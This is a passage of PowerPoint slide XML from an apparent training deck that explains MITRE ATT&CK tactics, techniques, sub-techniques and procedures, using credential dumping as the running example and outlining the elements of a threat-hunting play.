          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK - Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B54255AD-AD4A-501F-C3C7-D75DDD98EEA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The “why” of an ATT&amp;CK technique or sub-technique. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The adversary’s tactical goal -- the reason for performing an action. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Ex: an adversary may want to achieve credentialed access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1246535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34E5-23F3-5170-3229-B812E62451E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK - Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83562FEA-C477-8323-3484-DDA09EE8F671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>“How” an adversary achieves a tactical goal by performing an action. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Ex: an adversary may dump credentials to achieve credentialed access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199403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3C29-F24A-54E6-4A85-97755D9FF487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>MITRE ATT&amp;CK – Sub-techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01836B7-50FA-1777-9F70-E2EE1C839839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Sub-techniques are a more specific description of the adversarial behavior used to achieve a goal. They describe behavior at a lower level than a technique. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Ex: an adversary may dump credentials by accessing the Local Security Authority (LSA) Secrets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3854153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EA50-2AB5-674B-7EDD-925A3FD69C0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK - Procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2526984F-DC80-E8CF-D49E-42B89D30052F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Procedures are the specific implementation the adversary uses for techniques or sub-techniques. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Example: An adversary using PowerShell to inject into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>lsass.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> to dump credentials by scraping LSASS memory on a victim. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140813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Elements of a Play</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Identification name/number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Report Type/Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Objective of the play</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Analysis of the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Query to generate/review results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Comments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="675045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E512-82C9-F54F-8144-34A137D30A33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK - Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1EF1D5F-78CC-144A-9BEC-85B870AFCC95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This technique describes the act of gathering as much information as possible about the victim(s) of the adversary's operations. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Resource Development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This technique tries to cover the process of assessing the resources that the adversary uses. It could be purchased, developed, or even stolen resources that are going to be used to support their operations.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Initial Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This technique describes how the threat actor gets a foothold in the network using different entry vectors. We could say that this would be the threat actor's very first step into the victim's environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3836907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DAE6-4E99-FE4E-A556-7EEC79D15DA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK - Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1403E7BE-A9EC-D449-80E6-B34552FF0BA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The act of running malicious code inside the victim's environment. These techniques are usually used to achieve other goals, such as escalating privileges or exfiltrating information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: With the techniques that fall into this category, the threat actor is capable of remaining inside the system, even after it has been shut down</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or rebooted. Achieving persistence is one of the main goals of the threat actor once they've penetrated the system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Sometimes, the threat actors get inside the enterprise network through an unprivileged account and in order to carry out further action, they have to elevate their level of access. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3070706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4B9C-CC02-2748-94E6-FA4A877AF105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK - Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC485C2-F047-684E-B468-ED3683DFE325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Defense Evasion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This technique refers to all actions involved in avoiding being detected by the victim's defenses. This can involve a wide range of techniques, including installing and uninstalling software or trying to remove their traces from the system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Credential Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Sometimes, the threat actor tries to steal legitimate user credentials in order to gain access to systems, create more accounts, or disguise their activity as legitimate activity that's been carried out by a legitimate user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This tactic is used to group all the activity that the threat actor does to gain knowledge about how the victim's environment is constituted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lateral Movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: To move laterally, the threat actor usually has to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>discover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>how the network and systems are configured. After, the threat actor can try to pivot from one system to another until they reach their target. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1376513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1F87-50B2-BE46-8257-E890946FC3B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK - Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0070C36-64BA-FB45-A42E-A28AADB8B44E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Collection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This tactic refers to the act of gathering information from the victim's environment so that they can exfiltrate it later. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Command and Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This tactic describes any techniques involving the threat actor communicating with the systems under its control. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exfiltration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This technique refers to the act of stealing (exfiltrating) information while trying to remain undetected. This technique could include defense methods such as encryption and different types of exfiltration media and protocols. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: All attempts to prevent the victim from accessing his/her system, including manipulating or destroying it, fall under this tactic. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="738559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0DF5-114F-5C42-AFA5-D1EEDF37D0CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ATT&amp;CK Matrix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7847053C-4D80-E049-A90A-B64672C8ADA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/matrices/enterprise/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40D6811-913C-06B2-009B-569958B94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2611"/>
            <a:ext cx="9144000" cy="4149729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2370073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B496-647C-9DB4-79A5-C8E188C78A61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Credential Access – OS Dumping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F2D13E5-7448-B452-1CF6-13CDE4089F01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1003/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19A83C2-245B-96AF-7793-50585E12E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08200"/>
            <a:ext cx="7086600" cy="3149600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1953128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2C90-1AEC-BE83-0BD8-473ED57FF90E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Credential Access – OS Dumping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8268F548-30E7-82BC-47EF-0A6CBF1B04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02329"/>
            <a:ext cx="7620000" cy="3396342"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260094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64CD-8B20-13D1-08DB-27814C63EF7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Credential Access – OS Dumping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13B592D7-F666-D97C-BC87-69681A0621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300" y="2413000"/>
            <a:ext cx="3479800" cy="3175000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323038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3815-6744-6389-84F1-9878A0C01CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
